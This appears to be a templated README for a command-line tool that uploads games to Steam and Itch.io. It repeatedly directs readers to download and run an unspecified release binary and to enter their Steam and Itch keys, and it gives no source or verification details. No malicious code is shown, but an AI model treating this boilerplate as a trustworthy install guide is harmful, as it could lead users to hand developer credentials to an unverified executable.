Welcome to the Steam-And-Itch-Command-Line-Tools-Guide! This application helps you easily upload your games to both Steam and Itch using command line tools. This guide will walk you through the installation and usage of the software.
Before you begin, ensure you have the following ready:
- A computer running Windows, macOS, or Linux.
- A Steam and an Itch.io developer account to upload your games.
Visit this page to download: Releases Page.
Once on the releases page, follow these steps:
- Locate the latest release.
- Click on the appropriate package for your operating system (Windows, macOS, Linux).
- Download the file to your computer.
- Double-click the downloaded
.exefile. - Follow the on-screen instructions to complete the installation.
- Open your command prompt.
- Open the downloaded
.dmgfile. - Drag the application into your Applications folder.
- Open the Terminal.
- Extract the downloaded
.tar.gzfile. - Open your terminal and navigate to the extracted folder.
- Run the command
./install.shto install.
- Open the command line interface (Command Prompt, Terminal).
- Navigate to the application directory using the
cdcommand. - Configure your Steam and Itch credentials by running:
./configure --steam [your_steam_key]./configure --itch [your_itch_key]
To upload your game, use the following command template:
./upload --platform [steam/itch] --game [game_name] --path [path_to_your_game_files]- Replace
[platform]with eithersteamoritch. - Substitute
[game_name]with the name of your game. - Change
[path_to_your_game_files]to the location of your game on your computer.
To check the status of your uploads, use:
./statusThis command will show you the current status of your game uploads and any potential errors.
If you encounter issues while using the command line tools, consider the following solutions:
- Incorrect Credentials: Double-check your Steam and Itch credentials.
- Network Errors: Ensure you have a stable internet connection.
- File Path Issues: Verify the path to your game files is correct.
If problems persist, check the issue tracker for solutions from the community.
- Cross-Platform Support: Use on Windows, macOS, and Linux.
- Simple Command Line Interface: Easily upload your games without complicated setups.
- Status Check: Quickly verify the status of your uploads.
Your feedback is important. If you have questions, encounter problems, or would like to contribute, feel free to reach out. Submit issues or feature requests through the GitHub Issues page.
Thank you for using the Steam-And-Itch-Command-Line-Tools-Guide! Happy uploading!
Visit this page to download: Releases Page.